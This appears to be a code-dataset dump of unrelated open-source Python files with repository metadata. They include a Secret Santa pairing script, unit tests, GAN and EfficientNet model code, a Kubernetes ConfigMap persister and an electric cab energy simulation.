source = data[CONN_SOURCE_COL]
target = data[CONN_TARGET_COL]
year = data[CONN_YEAR_COL]
connections.add(source, target, year)
return connections
def saveConnections(csvPath, connections):
with open(csvPath, 'w') as file:
file.write('giver,receiver,year,weight\n')
for conn in connections:
file.write(','.join([
conn.source,
conn.target,
str(conn.year),
str(conn.weight)
]) + '\n')
def main():
argc = len(sys.argv)
if argc != 4 and argc != 5:
print('usage: ss.py <familyFile> <oldConnFile> ' +
'<newConnFile> [<connYear>]')
exit(1)
familyFile = sys.argv[1]
oldConnFile = sys.argv[2]
newConnFile = sys.argv[3]
connYear = int(sys.argv[4]) if argc == 5 else dt.datetime.now().year
families, members = loadFamilyMembers(familyFile)
oldConnections = loadConnections(oldConnFile,
families,
members)
santa = ss.SecretSanta(families, members, oldConnections)
newConnections = santa.genConnections(connYear)
totalWeight = sum(conn.weight for conn in newConnections)
print('Generated new connections for %d with total weight %d'
% (connYear, totalWeight))
saveConnections(newConnFile, newConnections)
if __name__ == '__main__':
main()
| import sys
import random
import secretsanta as ss
import datetime as dt
# CSV column mappings
FAM_MEMBER_COL = 0
FAM_FAMILY_COL = 1
CONN_SOURCE_COL = 0
CONN_TARGET_COL = 1
CONN_YEAR_COL = 2
def loadFamilyMembers(csvPath):
'''
Returns families, a map of members to their
associated families, and members, a map of
families to a set of its members.
'''
with open(csvPath, 'r') as file:
families = {}
members = {}
for line in file:
data = line.strip().split(',')
member = data[FAM_MEMBER_COL]
family = data[FAM_FAMILY_COL]
families[member] = family
if family not in members:
members[family] = set()
members[family].add(member)
return families, members
def loadConnections(csvPath, families, members):
with open(csvPath, 'r') as file:
connections = ss.ConnectionGraph(families,
members)
for line in file:
data = line.strip().split(',')
source = data[CONN_SOURCE_COL]
target = data[CONN_TARGET_COL]
year = data[CONN_YEAR_COL]
connections.add(source, target, year)
return connections
def saveConnections(csvPath, connections):
with open(csvPath, 'w') as file:
file.write('giver,receiver,year,weight\n')
for conn in connections:
file.write(','.join([
conn.source,
conn.target,
str(conn.year),
str(conn.weight)
]) + '\n')
def main():
argc = len(sys.argv)
if argc != 4 and argc != 5:
print('usage: ss.py <familyFile> <oldConnFile> ' +
'<newConnFile> [<connYear>]')
exit(1)
familyFile = sys.argv[1]
oldConnFile = sys.argv[2]
newConnFile = sys.argv[3]
connYear = int(sys.argv[4]) if argc == 5 else dt.datetime.now().year
families, members = loadFamilyMembers(familyFile)
oldConnections = loadConnections(oldConnFile,
families,
members)
santa = ss.SecretSanta(families, members, oldConnections)
newConnections = santa.genConnections(connYear)
totalWeight = sum(conn.weight for conn in newConnections)
print('Generated new connections for %d with total weight %d'
% (connYear, totalWeight))
saveConnections(newConnFile, newConnections)
if __name__ == '__main__':
main()
| en | 0.965213 | # CSV column mappings Returns families, a map of members to their associated families, and members, a map of families to a set of its members. | 2.821219 | 3 |
python/test/test_1_3_URLify.py | cjoverbay/cracking-the-code-interview-solutions | 0 | 6617416 | <gh_stars>0
import unittest
from python.solution.chapter_01_arrays_and_strings import problem_1_3_URLify
# Grab all specific implementations from this solution
implementations = []
for attr in [getattr(problem_1_3_URLify, x) for x in dir(problem_1_3_URLify)]:
if callable(attr):
implementations.append(attr)
class Tests(unittest.TestCase):
def setUp(self):
pass
def test_handles_spaces(self):
for urlify in implementations:
self.assertSequenceEqual(urlify([c for c in 'Mr <NAME> ']), [c for c in 'Mr%20John%20Smith'])
def test_handles_empty(self):
for urlify in implementations:
self.assertSequenceEqual(urlify([]), [])
def test_handles_no_spaces(self):
for urlify in implementations:
self.assertSequenceEqual(urlify([c for c in 'nospaces']), [c for c in 'nospaces'])
| import unittest
from python.solution.chapter_01_arrays_and_strings import problem_1_3_URLify
# Grab all specific implementations from this solution
implementations = []
for attr in [getattr(problem_1_3_URLify, x) for x in dir(problem_1_3_URLify)]:
if callable(attr):
implementations.append(attr)
class Tests(unittest.TestCase):
def setUp(self):
pass
def test_handles_spaces(self):
for urlify in implementations:
self.assertSequenceEqual(urlify([c for c in 'Mr <NAME> ']), [c for c in 'Mr%20John%20Smith'])
def test_handles_empty(self):
for urlify in implementations:
self.assertSequenceEqual(urlify([]), [])
def test_handles_no_spaces(self):
for urlify in implementations:
self.assertSequenceEqual(urlify([c for c in 'nospaces']), [c for c in 'nospaces']) | en | 0.790878 | # Grab all specific implementations from this solution | 3.157712 | 3 |
utils.py | kanesp/Image_WGAN_GP | 7 | 6617417 | <gh_stars>1-10
import os
import matplotlib.pyplot as plt
import numpy as np
import torch
from torch.autograd import Variable
import torch.autograd as autograd
def mkdir(dir):
if not os.path.exists(dir):
os.makedirs(dir)
def savefig(fname, dpi=None):
dpi = 150 if dpi == None else dpi
plt.savefig(fname, dpi=dpi, format='png')
cuda = True if torch.cuda.is_available() else False
Tensor = torch.cuda.FloatTensor if cuda else torch.FloatTensor
def compute_gradient_penalty(D, real_samples, fake_samples):
"""Calculates the gradient penalty loss for WGAN GP"""
# Random weight term for interpolation between real and fake samples
alpha = Tensor(np.random.random((real_samples.size(0), 1, 1, 1)))
# Get random interpolation between real and fake samples
interpolates = (alpha * real_samples + ((1 - alpha) * fake_samples)).requires_grad_(True)
d_interpolates = D(interpolates)
fake = Variable(Tensor(real_samples.shape[0], 1).fill_(1.0), requires_grad=False)
# Get gradient w.r.t. interpolates
gradients = autograd.grad(
outputs=d_interpolates,
inputs=interpolates,
grad_outputs=fake,
create_graph=True,
retain_graph=True,
only_inputs=True,
)[0]
gradients = gradients.view(gradients.size(0), -1)
gradient_penalty = ((gradients.norm(2, dim=1) - 1) ** 2).mean()
return gradient_penalty
| import os
import matplotlib.pyplot as plt
import numpy as np
import torch
from torch.autograd import Variable
import torch.autograd as autograd
def mkdir(dir):
if not os.path.exists(dir):
os.makedirs(dir)
def savefig(fname, dpi=None):
dpi = 150 if dpi == None else dpi
plt.savefig(fname, dpi=dpi, format='png')
cuda = True if torch.cuda.is_available() else False
Tensor = torch.cuda.FloatTensor if cuda else torch.FloatTensor
def compute_gradient_penalty(D, real_samples, fake_samples):
"""Calculates the gradient penalty loss for WGAN GP"""
# Random weight term for interpolation between real and fake samples
alpha = Tensor(np.random.random((real_samples.size(0), 1, 1, 1)))
# Get random interpolation between real and fake samples
interpolates = (alpha * real_samples + ((1 - alpha) * fake_samples)).requires_grad_(True)
d_interpolates = D(interpolates)
fake = Variable(Tensor(real_samples.shape[0], 1).fill_(1.0), requires_grad=False)
# Get gradient w.r.t. interpolates
gradients = autograd.grad(
outputs=d_interpolates,
inputs=interpolates,
grad_outputs=fake,
create_graph=True,
retain_graph=True,
only_inputs=True,
)[0]
gradients = gradients.view(gradients.size(0), -1)
gradient_penalty = ((gradients.norm(2, dim=1) - 1) ** 2).mean()
return gradient_penalty | en | 0.794879 | Calculates the gradient penalty loss for WGAN GP # Random weight term for interpolation between real and fake samples # Get random interpolation between real and fake samples # Get gradient w.r.t. interpolates | 2.271276 | 2 |
Codeforces/A_Little_Elephant_and_Rozdil.py | anubhab-code/Competitive-Programming | 0 | 6617418 | n=int(input())
z=list(map(int,input().split()))
k=min(z)
if z.count(k)>=2:
print("Still Rozdil")
else:
print(z.index(k)+1) | n=int(input())
z=list(map(int,input().split()))
k=min(z)
if z.count(k)>=2:
print("Still Rozdil")
else:
print(z.index(k)+1) | none | 1 | 3.280355 | 3 | |
python_module/SuperGLU/Util/Tests/Suite.py | GeneralizedLearningUtilities/SuperGLU | 8 | 6617419 | <filename>python_module/SuperGLU/Util/Tests/Suite.py<gh_stars>1-10
import unittest
import SuperGLU.Util.Tests.TestGenerator_UnitTests as TestGenerator_UnitTests
import SuperGLU.Util.Tests.Serialization_UnitTests as Serialization_UnitTests
def TestSuite():
"""
Returns a TestSuite object that covers the Util module
"""
suite = unittest.TestSuite()
loader = unittest.TestLoader()
modules = [TestGenerator_UnitTests,
Serialization_UnitTests]
for m in modules:
suite.addTests(loader.loadTestsFromModule(m))
return suite
if __name__ == "__main__":
import sys
sys.exit(not unittest.TextTestRunner().run(TestSuite()))
| <filename>python_module/SuperGLU/Util/Tests/Suite.py<gh_stars>1-10
import unittest
import SuperGLU.Util.Tests.TestGenerator_UnitTests as TestGenerator_UnitTests
import SuperGLU.Util.Tests.Serialization_UnitTests as Serialization_UnitTests
def TestSuite():
"""
Returns a TestSuite object that covers the Util module
"""
suite = unittest.TestSuite()
loader = unittest.TestLoader()
modules = [TestGenerator_UnitTests,
Serialization_UnitTests]
for m in modules:
suite.addTests(loader.loadTestsFromModule(m))
return suite
if __name__ == "__main__":
import sys
sys.exit(not unittest.TextTestRunner().run(TestSuite()))
| en | 0.482674 | Returns a TestSuite object that covers the Util module | 2.047481 | 2 |
kubedriver/persistence/config_map_persister.py | manojn97/kubernetes-driver | 2 | 6617420 | <filename>kubedriver/persistence/config_map_persister.py
from kubernetes.client.rest import ApiException
from kubedriver.kubeobjects import ObjectConfiguration, ObjectAttributes
from .exceptions import RecordNotFoundError, PersistenceError, InvalidRecordError
from openshift.dynamic.exceptions import DynamicApiError, NotFoundError, BadRequestError
class ConfigMapPersister:
def __init__(self, stored_type_name, kube_api_ctl, storage_namespace, record_builder, cm_api_version='v1', cm_kind='ConfigMap', cm_data_field='data'):
self.stored_type_name = stored_type_name
self.kube_api_ctl = kube_api_ctl
self.storage_namespace = storage_namespace
self.record_builder = record_builder
self.cm_api_version = cm_api_version
self.cm_kind = cm_kind
self.cm_data_field = cm_data_field
def __raise_error(self, operation, exception, config_map_name):
if isinstance(exception, DynamicApiError):
summary = exception.summary()
else:
summary = str(exception)
message = f'Failed to {operation} record for {self.stored_type_name} \'{config_map_name}\' as an error occurred: {summary}'
if isinstance(exception, NotFoundError):
raise RecordNotFoundError(message) from exception
elif isinstance(exception, BadRequestError):
raise InvalidRecordError(message) from exception
else:
raise PersistenceError(message) from exception
def build_record_reference(self, uid, record_name):
return {
'apiVersion': self.cm_api_version,
'kind': self.cm_kind,
'metadata': {
'name': record_name,
'namespace': self.storage_namespace,
'uid': uid
}
}
def get_record_uid(self, record_name):
record_cm = self.__get_config_map_for(record_name)
return record_cm.metadata.uid
def create(self, record_name, record_data, labels=None):
cm_config = self.__build_config_map_for_record(record_name, record_data, labels=labels)
try:
self.kube_api_ctl.create_object(cm_config, default_namespace=self.storage_namespace)
except ApiException as e:
self.__raise_error('create', e, record_name)
def update(self, record_name, record_data):
existing_cm = self.__get_config_map_for(record_name)
cm_config = self.__build_config_map_for_record(record_name, record_data, existing_cm=existing_cm)
try:
self.kube_api_ctl.update_object(cm_config, default_namespace=self.storage_namespace)
except ApiException as e:
self.__raise_error('update', e, record_name)
def __get_config_map_for(self, record_name):
try:
record_cm = self.kube_api_ctl.read_object(self.cm_api_version, self.cm_kind, record_name, namespace=self.storage_namespace)
return record_cm
except ApiException as e:
self.__raise_error('read', e, record_name)
def get(self, record_name):
record_cm = self.__get_config_map_for(record_name)
return self.__read_config_map_to_record(record_cm)
def delete(self, record_name):
try:
self.kube_api_ctl.delete_object(self.cm_api_version, self.cm_kind, record_name, namespace=self.storage_namespace)
except ApiException as e:
self.__raise_error('delete', e, record_name)
def __build_config_map_for_record(self, record_name, record_data, labels=None, existing_cm=None):
if labels == None:
labels = {}
if existing_cm is not None and existing_cm.metadata is not None and existing_cm.metadata.labels is not None:
merged_labels = {}
merged_labels.update(existing_cm.metadata.labels)
merged_labels.update(labels)
labels = merged_labels
cm_obj_config = {
ObjectAttributes.API_VERSION: self.cm_api_version,
ObjectAttributes.KIND: self.cm_kind,
ObjectAttributes.METADATA: {
ObjectAttributes.NAME: record_name,
ObjectAttributes.NAMESPACE: self.storage_namespace,
ObjectAttributes.LABELS: labels
},
self.cm_data_field: {
'record': self.record_builder.to_record(record_data)
}
}
return ObjectConfiguration(cm_obj_config)
def __read_config_map_to_record(self, config_map):
cm_data = config_map.data
record_data = cm_data.get('record')
return self.record_builder.from_record(record_data)
| <filename>kubedriver/persistence/config_map_persister.py
from kubernetes.client.rest import ApiException
from kubedriver.kubeobjects import ObjectConfiguration, ObjectAttributes
from .exceptions import RecordNotFoundError, PersistenceError, InvalidRecordError
from openshift.dynamic.exceptions import DynamicApiError, NotFoundError, BadRequestError
class ConfigMapPersister:
def __init__(self, stored_type_name, kube_api_ctl, storage_namespace, record_builder, cm_api_version='v1', cm_kind='ConfigMap', cm_data_field='data'):
self.stored_type_name = stored_type_name
self.kube_api_ctl = kube_api_ctl
self.storage_namespace = storage_namespace
self.record_builder = record_builder
self.cm_api_version = cm_api_version
self.cm_kind = cm_kind
self.cm_data_field = cm_data_field
def __raise_error(self, operation, exception, config_map_name):
if isinstance(exception, DynamicApiError):
summary = exception.summary()
else:
summary = str(exception)
message = f'Failed to {operation} record for {self.stored_type_name} \'{config_map_name}\' as an error occurred: {summary}'
if isinstance(exception, NotFoundError):
raise RecordNotFoundError(message) from exception
elif isinstance(exception, BadRequestError):
raise InvalidRecordError(message) from exception
else:
raise PersistenceError(message) from exception
def build_record_reference(self, uid, record_name):
return {
'apiVersion': self.cm_api_version,
'kind': self.cm_kind,
'metadata': {
'name': record_name,
'namespace': self.storage_namespace,
'uid': uid
}
}
def get_record_uid(self, record_name):
record_cm = self.__get_config_map_for(record_name)
return record_cm.metadata.uid
def create(self, record_name, record_data, labels=None):
cm_config = self.__build_config_map_for_record(record_name, record_data, labels=labels)
try:
self.kube_api_ctl.create_object(cm_config, default_namespace=self.storage_namespace)
except ApiException as e:
self.__raise_error('create', e, record_name)
def update(self, record_name, record_data):
existing_cm = self.__get_config_map_for(record_name)
cm_config = self.__build_config_map_for_record(record_name, record_data, existing_cm=existing_cm)
try:
self.kube_api_ctl.update_object(cm_config, default_namespace=self.storage_namespace)
except ApiException as e:
self.__raise_error('update', e, record_name)
def __get_config_map_for(self, record_name):
try:
record_cm = self.kube_api_ctl.read_object(self.cm_api_version, self.cm_kind, record_name, namespace=self.storage_namespace)
return record_cm
except ApiException as e:
self.__raise_error('read', e, record_name)
def get(self, record_name):
record_cm = self.__get_config_map_for(record_name)
return self.__read_config_map_to_record(record_cm)
def delete(self, record_name):
try:
self.kube_api_ctl.delete_object(self.cm_api_version, self.cm_kind, record_name, namespace=self.storage_namespace)
except ApiException as e:
self.__raise_error('delete', e, record_name)
def __build_config_map_for_record(self, record_name, record_data, labels=None, existing_cm=None):
if labels == None:
labels = {}
if existing_cm is not None and existing_cm.metadata is not None and existing_cm.metadata.labels is not None:
merged_labels = {}
merged_labels.update(existing_cm.metadata.labels)
merged_labels.update(labels)
labels = merged_labels
cm_obj_config = {
ObjectAttributes.API_VERSION: self.cm_api_version,
ObjectAttributes.KIND: self.cm_kind,
ObjectAttributes.METADATA: {
ObjectAttributes.NAME: record_name,
ObjectAttributes.NAMESPACE: self.storage_namespace,
ObjectAttributes.LABELS: labels
},
self.cm_data_field: {
'record': self.record_builder.to_record(record_data)
}
}
return ObjectConfiguration(cm_obj_config)
def __read_config_map_to_record(self, config_map):
cm_data = config_map.data
record_data = cm_data.get('record')
return self.record_builder.from_record(record_data)
| none | 1 | 2.220463 | 2 | |
hearline/models/efficientnet_b0.py | ibkuroyagi/hear2021-submit | 0 | 6617421 | <filename>hearline/models/efficientnet_b0.py
"""EfficientNet."""
import logging
import torch
import torch.nn as nn
import torchaudio.transforms as T
from efficientnet_pytorch import EfficientNet
class EfficientNet_b0(nn.Module):
def __init__(
self,
sample_rate=16000,
n_fft=400,
hop_length=160,
n_mels=64,
n_embedding=512,
n_aug=None,
):
super(self.__class__, self).__init__()
self.spectrogram_extracter = T.MelSpectrogram(
sample_rate=sample_rate,
n_fft=n_fft,
win_length=n_fft,
hop_length=hop_length,
power=2.0,
n_mels=n_mels,
)
self.efficientnet = EfficientNet.from_name(
model_name="efficientnet-b0", in_channels=1
)
self.fc1 = nn.Linear(1280, n_embedding, bias=True)
self.layer_norm = torch.nn.LayerNorm(normalized_shape=n_embedding)
self.fc2 = torch.nn.Linear(n_embedding, n_embedding, bias=False)
self.sample_rate = sample_rate
self.scene_embedding_size = n_embedding
self.timestamp_embedding_size = n_embedding
self.n_timestamp = None
self.n_aug = n_aug
if n_aug is not None:
self.aug_fc = nn.Linear(n_embedding, n_aug, bias=True)
def forward(self, X):
"""X: (batch_size, T', mels)"""
# logging.info(f"X:{X.shape}")
if len(X.shape) == 2:
# X: (batch_size, wave_length)->(batch_size, T', mels)
X = self.spectrogram_extracter(X).transpose(1, 2)
x = X.unsqueeze(1) # (B, 1, T', mels)
x = self.efficientnet.extract_features(x)
# logging.info(f"x:{x.shape}")
x = x.max(dim=3)[0]
# logging.info(f"x:{x.shape}")
embedding_h = self.fc1(x.transpose(1, 2)).transpose(1, 2)
self.n_timestamp = embedding_h.shape[2]
# logging.info(f"embedding_h: {embedding_h.shape}")
embed = torch.tanh(self.layer_norm(embedding_h.max(dim=2)[0]))
embedding_z = self.fc2(embed)
output_dict = {
# (B, T', timestamp_embedding_size)
"framewise_embedding": embedding_h.transpose(1, 2),
# (B, scene_embedding_size)
"clipwise_embedding": embedding_h.max(dim=2)[0],
"embedding_z": embedding_z, # (B, n_embedding)
}
if self.n_aug is not None:
output_dict["aug_output"] = self.aug_fc(embed)
return output_dict
| <filename>hearline/models/efficientnet_b0.py
"""EfficientNet."""
import logging
import torch
import torch.nn as nn
import torchaudio.transforms as T
from efficientnet_pytorch import EfficientNet
class EfficientNet_b0(nn.Module):
def __init__(
self,
sample_rate=16000,
n_fft=400,
hop_length=160,
n_mels=64,
n_embedding=512,
n_aug=None,
):
super(self.__class__, self).__init__()
self.spectrogram_extracter = T.MelSpectrogram(
sample_rate=sample_rate,
n_fft=n_fft,
win_length=n_fft,
hop_length=hop_length,
power=2.0,
n_mels=n_mels,
)
self.efficientnet = EfficientNet.from_name(
model_name="efficientnet-b0", in_channels=1
)
self.fc1 = nn.Linear(1280, n_embedding, bias=True)
self.layer_norm = torch.nn.LayerNorm(normalized_shape=n_embedding)
self.fc2 = torch.nn.Linear(n_embedding, n_embedding, bias=False)
self.sample_rate = sample_rate
self.scene_embedding_size = n_embedding
self.timestamp_embedding_size = n_embedding
self.n_timestamp = None
self.n_aug = n_aug
if n_aug is not None:
self.aug_fc = nn.Linear(n_embedding, n_aug, bias=True)
def forward(self, X):
"""X: (batch_size, T', mels)"""
# logging.info(f"X:{X.shape}")
if len(X.shape) == 2:
# X: (batch_size, wave_length)->(batch_size, T', mels)
X = self.spectrogram_extracter(X).transpose(1, 2)
x = X.unsqueeze(1) # (B, 1, T', mels)
x = self.efficientnet.extract_features(x)
# logging.info(f"x:{x.shape}")
x = x.max(dim=3)[0]
# logging.info(f"x:{x.shape}")
embedding_h = self.fc1(x.transpose(1, 2)).transpose(1, 2)
self.n_timestamp = embedding_h.shape[2]
# logging.info(f"embedding_h: {embedding_h.shape}")
embed = torch.tanh(self.layer_norm(embedding_h.max(dim=2)[0]))
embedding_z = self.fc2(embed)
output_dict = {
# (B, T', timestamp_embedding_size)
"framewise_embedding": embedding_h.transpose(1, 2),
# (B, scene_embedding_size)
"clipwise_embedding": embedding_h.max(dim=2)[0],
"embedding_z": embedding_z, # (B, n_embedding)
}
if self.n_aug is not None:
output_dict["aug_output"] = self.aug_fc(embed)
return output_dict
| en | 0.534536 | EfficientNet. X: (batch_size, T', mels) # logging.info(f"X:{X.shape}") # X: (batch_size, wave_length)->(batch_size, T', mels) # (B, 1, T', mels) # logging.info(f"x:{x.shape}") # logging.info(f"x:{x.shape}") # logging.info(f"embedding_h: {embedding_h.shape}") # (B, T', timestamp_embedding_size) # (B, scene_embedding_size) # (B, n_embedding) | 2.288063 | 2 |
spaceopt/variable.py | ar-nowaczynski/spaceopt | 46 | 6617422 | <reponame>ar-nowaczynski/spaceopt<filename>spaceopt/variable.py
import random
from collections import Counter
from typing import Union
import pandas as pd
class Variable:
_ALLOWED_VTYPES = (float, int, str, bool)
def __init__(self, name: str, values: list) -> None:
self._verify_name(name)
self.name = name
self._verify_values(values)
self.values = values
self.vtype = self._get_vtype_from_values()
@property
def is_categorical(self) -> bool:
return self.vtype is str
def sample(self) -> Union[float, int, str, bool]:
return random.choice(self.values)
def encode(self, df: pd.DataFrame) -> pd.DataFrame:
if self.is_categorical:
encoding = dict(zip(self.values, range(len(self.values))))
df[self.name] = df[self.name].map(encoding)
return df
def decode(self, df: pd.DataFrame) -> pd.DataFrame:
if self.is_categorical:
decoding = dict(zip(range(len(self.values)), self.values))
df[self.name] = df[self.name].map(decoding)
return df
def _get_vtype_from_values(self) -> type:
vtypes = [type(value) for value in self.values]
cnt = Counter(vtypes)
if len(cnt) != 1:
value_types = "\n".join([f"{v} : {type(v)}" for v in self.values])
raise RuntimeError(
f"Multiple value types for a {self.__class__.__name__}"
f" named {repr(self.name)}"
f" with values={self.values}."
f" Encountered value types:\n{value_types}\n"
"All values should be of the same type."
f" Allowed value types: {self._ALLOWED_VTYPES}."
)
vtype = cnt.most_common()[0][0]
if vtype not in self._ALLOWED_VTYPES:
raise RuntimeError(
f"All values={self.values} for a {self.__class__.__name__}"
f" named {repr(self.name)}"
f" are of type {vtype}, which is not allowed."
f" Please use one of: {self._ALLOWED_VTYPES}."
)
return vtype
def _verify_name(self, name: str) -> None:
if not isinstance(name, str):
raise TypeError(
f"Invalid name={name} for a {self.__class__.__name__}."
f" Provided name is of type {type(name)},"
f" but it should be of type {str}."
)
def _verify_values(self, values: list) -> None:
if not isinstance(values, list):
raise TypeError(
f"{self.__class__.__name__} named {repr(self.name)}"
f" has values={values}"
f" of type {type(values)},"
f" but it should be of type {list}."
)
if len(values) == 0:
raise ValueError(
f"{self.__class__.__name__} named {repr(self.name)}"
" has an empty list of values."
)
def __str__(self) -> str:
indent = " " * 4
innerstr = [
f"name={repr(self.name)}",
f"values={self.values}",
f"vtype={self.vtype}",
f"is_categorical={self.is_categorical}",
]
innerstr = indent + (",\n" + indent).join(innerstr)
outstr = "{cls}(\n{innerstr}\n)".format(
cls=self.__class__.__name__,
innerstr=innerstr,
)
return outstr
| import random
from collections import Counter
from typing import Union
import pandas as pd
class Variable:
_ALLOWED_VTYPES = (float, int, str, bool)
def __init__(self, name: str, values: list) -> None:
self._verify_name(name)
self.name = name
self._verify_values(values)
self.values = values
self.vtype = self._get_vtype_from_values()
@property
def is_categorical(self) -> bool:
return self.vtype is str
def sample(self) -> Union[float, int, str, bool]:
return random.choice(self.values)
def encode(self, df: pd.DataFrame) -> pd.DataFrame:
if self.is_categorical:
encoding = dict(zip(self.values, range(len(self.values))))
df[self.name] = df[self.name].map(encoding)
return df
def decode(self, df: pd.DataFrame) -> pd.DataFrame:
if self.is_categorical:
decoding = dict(zip(range(len(self.values)), self.values))
df[self.name] = df[self.name].map(decoding)
return df
def _get_vtype_from_values(self) -> type:
vtypes = [type(value) for value in self.values]
cnt = Counter(vtypes)
if len(cnt) != 1:
value_types = "\n".join([f"{v} : {type(v)}" for v in self.values])
raise RuntimeError(
f"Multiple value types for a {self.__class__.__name__}"
f" named {repr(self.name)}"
f" with values={self.values}."
f" Encountered value types:\n{value_types}\n"
"All values should be of the same type."
f" Allowed value types: {self._ALLOWED_VTYPES}."
)
vtype = cnt.most_common()[0][0]
if vtype not in self._ALLOWED_VTYPES:
raise RuntimeError(
f"All values={self.values} for a {self.__class__.__name__}"
f" named {repr(self.name)}"
f" are of type {vtype}, which is not allowed."
f" Please use one of: {self._ALLOWED_VTYPES}."
)
return vtype
def _verify_name(self, name: str) -> None:
if not isinstance(name, str):
raise TypeError(
f"Invalid name={name} for a {self.__class__.__name__}."
f" Provided name is of type {type(name)},"
f" but it should be of type {str}."
)
def _verify_values(self, values: list) -> None:
if not isinstance(values, list):
raise TypeError(
f"{self.__class__.__name__} named {repr(self.name)}"
f" has values={values}"
f" of type {type(values)},"
f" but it should be of type {list}."
)
if len(values) == 0:
raise ValueError(
f"{self.__class__.__name__} named {repr(self.name)}"
" has an empty list of values."
)
def __str__(self) -> str:
indent = " " * 4
innerstr = [
f"name={repr(self.name)}",
f"values={self.values}",
f"vtype={self.vtype}",
f"is_categorical={self.is_categorical}",
]
innerstr = indent + (",\n" + indent).join(innerstr)
outstr = "{cls}(\n{innerstr}\n)".format(
cls=self.__class__.__name__,
innerstr=innerstr,
)
return outstr | none | 1 | 2.841173 | 3 | |
GeoDataCabSim.py | hornbartho/Vehicle-Simulation | 0 | 6617423 | import gpxpy
import matplotlib.pyplot as plt
import datetime
from geopy import distance
from geopy.distance import geodesic
from math import sqrt, floor, pi, sin
import numpy as np
import pandas as pd
import plotly.plotly as py
import plotly.graph_objs as go
import haversine
import math as mth
#########################################
g = 9.81
Weight = 380 + 170
Tire_Radius = 0.318
Cd = 0.825
Frontal_Area_Cab = 1.84*1.14
rho = 1.225
Vmax = 50
Vs = Vmax/3.6
effmotor = 0.785
effgearbox = 0.98
effelectrical = 0.9
Battery_Cap = 7.2
Pressure_Tire = 2.2
Average_Trip_Distance = 2
Change_In_Altitude = 20
Cab_Acceleration = 0.76
########################################
gpx_file = open('Test track.gpx', 'r')
gpx = gpxpy.parse(gpx_file)
data = gpx.tracks[0].segments[0].points
start = data[0]
finish = data[-1]
df = pd.DataFrame(columns=['lon', 'lat', 'alt', 'time'])
for point in data:
df = df.append({'lon': point.longitude, 'lat' : point.latitude, 'alt' : point.elevation, 'time' : point.time}, ignore_index=True)
Time_Seconds = np.linspace(0,len(df['alt'])-1,len(df['alt']))
Altitude = df['alt']
Longatude = df['lon']
Latitude = df['lat']
x = np.zeros(len(df))
i = 0
while i < len(df)-1:
Data_Now = (Longatude[i],Latitude[i])
Data_Next = (Longatude[i+1],Latitude[i+1])
x[i] = geodesic(Data_Now, Data_Next).meters
i += 1
Speed = x
Degree = np.zeros(len(df))
n = 0
while n < len(df)-1:
Ratio = (Altitude[n+1] - Altitude[n]) / x[n]
Degree[n] = ((mth.asin(Ratio))/((mth.pi)*2))*360
n += 1
Acceleration = np.zeros(len(df))
k = 0
while k < len(df)-1:
Difference = Speed[k+1] - Speed[k]
if Difference < 0:
Acceleration[k] = 0
elif Difference > 0.76:
Acceleration[k] = 0.76
else:
Acceleration[k] = Difference
k += 1
Crr = 0.005 + (1 / Pressure_Tire)*(0.01 + 0.0095*((Speed*3.6) / 100)**2)
theta = (Degree*pi)/180
FORCE_Rolling_Resistance = Crr*Weight*g
FORCE_Drag = 0.5*Cd*Frontal_Area_Cab*(rho*(Speed**2))
FORCE_Incline = Weight*g*theta
FORCE_Acceleration = Weight*Acceleration
FORCE_Resultant = FORCE_Rolling_Resistance + FORCE_Drag + FORCE_Incline + FORCE_Acceleration
TORQUE_Wheel = FORCE_Resultant*Tire_Radius
Radial_Wheel_Speed = Speed/Tire_Radius
eff = effmotor*effgearbox*effelectrical
Pout = TORQUE_Wheel*Radial_Wheel_Speed
Pin = (Pout/(eff))
Energy = np.sum(Pin)
plt.plot(Time_Seconds,Speed)
plt.show()
###############################################################################
| import gpxpy
import matplotlib.pyplot as plt
import datetime
from geopy import distance
from geopy.distance import geodesic
from math import sqrt, floor, pi, sin
import numpy as np
import pandas as pd
import plotly.plotly as py
import plotly.graph_objs as go
import haversine
import math as mth
#########################################
g = 9.81
Weight = 380 + 170
Tire_Radius = 0.318
Cd = 0.825
Frontal_Area_Cab = 1.84*1.14
rho = 1.225
Vmax = 50
Vs = Vmax/3.6
effmotor = 0.785
effgearbox = 0.98
effelectrical = 0.9
Battery_Cap = 7.2
Pressure_Tire = 2.2
Average_Trip_Distance = 2
Change_In_Altitude = 20
Cab_Acceleration = 0.76
########################################
gpx_file = open('Test track.gpx', 'r')
gpx = gpxpy.parse(gpx_file)
data = gpx.tracks[0].segments[0].points
start = data[0]
finish = data[-1]
df = pd.DataFrame(columns=['lon', 'lat', 'alt', 'time'])
for point in data:
df = df.append({'lon': point.longitude, 'lat' : point.latitude, 'alt' : point.elevation, 'time' : point.time}, ignore_index=True)
Time_Seconds = np.linspace(0,len(df['alt'])-1,len(df['alt']))
Altitude = df['alt']
Longatude = df['lon']
Latitude = df['lat']
x = np.zeros(len(df))
i = 0
while i < len(df)-1:
Data_Now = (Longatude[i],Latitude[i])
Data_Next = (Longatude[i+1],Latitude[i+1])
x[i] = geodesic(Data_Now, Data_Next).meters
i += 1
Speed = x
Degree = np.zeros(len(df))
n = 0
while n < len(df)-1:
Ratio = (Altitude[n+1] - Altitude[n]) / x[n]
Degree[n] = ((mth.asin(Ratio))/((mth.pi)*2))*360
n += 1
Acceleration = np.zeros(len(df))
k = 0
while k < len(df)-1:
Difference = Speed[k+1] - Speed[k]
if Difference < 0:
Acceleration[k] = 0
elif Difference > 0.76:
Acceleration[k] = 0.76
else:
Acceleration[k] = Difference
k += 1
Crr = 0.005 + (1 / Pressure_Tire)*(0.01 + 0.0095*((Speed*3.6) / 100)**2)
theta = (Degree*pi)/180
FORCE_Rolling_Resistance = Crr*Weight*g
FORCE_Drag = 0.5*Cd*Frontal_Area_Cab*(rho*(Speed**2))
FORCE_Incline = Weight*g*theta
FORCE_Acceleration = Weight*Acceleration
FORCE_Resultant = FORCE_Rolling_Resistance + FORCE_Drag + FORCE_Incline + FORCE_Acceleration
TORQUE_Wheel = FORCE_Resultant*Tire_Radius
Radial_Wheel_Speed = Speed/Tire_Radius
eff = effmotor*effgearbox*effelectrical
Pout = TORQUE_Wheel*Radial_Wheel_Speed
Pin = (Pout/(eff))
Energy = np.sum(Pin)
plt.plot(Time_Seconds,Speed)
plt.show()
###############################################################################
| de | 0.874044 | ######################################### ######################################## ############################################################################### | 2.642863 | 3 |
Omniglot/model.py | yaohungt/Demystifying_Self_Supervised_Learning | 21 | 6617424 | import torch
import torch.nn as nn
import torch.nn.functional as F
from torchvision.models.resnet import resnet18, resnet34, resnet50
class Model(nn.Module):
def __init__(self, feature_dim=128, resnet_depth=18):
super(Model, self).__init__()
self.f = []
